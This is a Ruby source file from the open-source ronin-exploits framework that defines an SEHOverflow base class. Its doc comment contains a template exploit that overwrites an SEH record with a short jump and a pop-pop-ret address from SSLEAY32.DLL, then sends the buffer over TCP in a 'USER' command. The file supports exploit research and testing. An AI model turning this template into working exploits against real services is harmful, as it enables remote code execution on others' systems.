# frozen_string_literal: true
#
# ronin-exploits - A Ruby library for ronin-rb that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# ronin-exploits is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ronin-exploits is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with ronin-exploits.  If not, see <https://www.gnu.org/licenses/>.
#

require 'ronin/exploits/memory_corruption'
require 'ronin/exploits/mixins/seh'

module Ronin
  module Exploits
    #
    # Represents a Structured Exception Handler (SEH) overflow.
    #
    # ## Example
    #
    #     require 'ronin/exploits/seh_overflow'
    #     require 'ronin/exploits/mixins/remote_tcp'
    #
    #     module Ronin
    #       module Exploits
    #         class MyExploit < SEHOverflow
    #
    #           register 'my_exploit'
    #
    #           include Mixins::RemoteTCP
    #
    #           def build
    #             nseh = 0x06eb9090 # short jump 6 bytes
    #             seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL
    #
    #             @buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)
    #           end
    #
    #           def launch
    #             tcp_send "USER #{@buffer}"
    #           end
    #
    #         end
    #       end
    #     end
    #
    # If you want more control over how the buffer is constructed:
    #
    #     def build
    #       nseh = 0x06eb9090 # short jump 6 bytes
    #       seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL
    #
    #       @buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload
    #     end
    #
    # @api public
    #
    # @since 1.0.0
    #
    class SEHOverflow < MemoryCorruption

      include Mixins::SEH

      #
      # Returns the type or kind of exploit.
      #
      # @return [Symbol]
      #
      # @note
      #   This is used internally to map an exploit class to a printable type.
      #
      # @api private
      #
      def self.exploit_type
        :seh_overflow
      end

    end
  end
end